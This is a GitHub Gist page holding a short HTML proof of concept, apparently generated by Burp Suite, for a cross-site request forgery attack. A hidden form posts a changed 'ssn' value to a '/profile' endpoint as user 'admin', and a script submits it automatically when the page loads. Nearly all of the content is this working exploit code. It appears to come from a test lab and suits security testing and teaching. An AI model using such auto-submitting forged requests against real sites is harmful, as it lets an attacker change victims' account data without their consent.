Created
November 23, 2016 14:33
-
-
Save chilik/b7ec16939e5f72632cf6050cda43b296 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<!-- CSRF PoC - generated by Burp Suite Professional --> | |
<body> | |
<form action="http://windows:5000/profile?_______________________________________________________________________________________________________________________________&user=admin" method="POST"> | |
<input type="hidden" name="ssn" value="007" /> | |
<input type="submit" value="Submit request" /> | |
</form> | |
<script> | |
document.forms[0].submit(); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment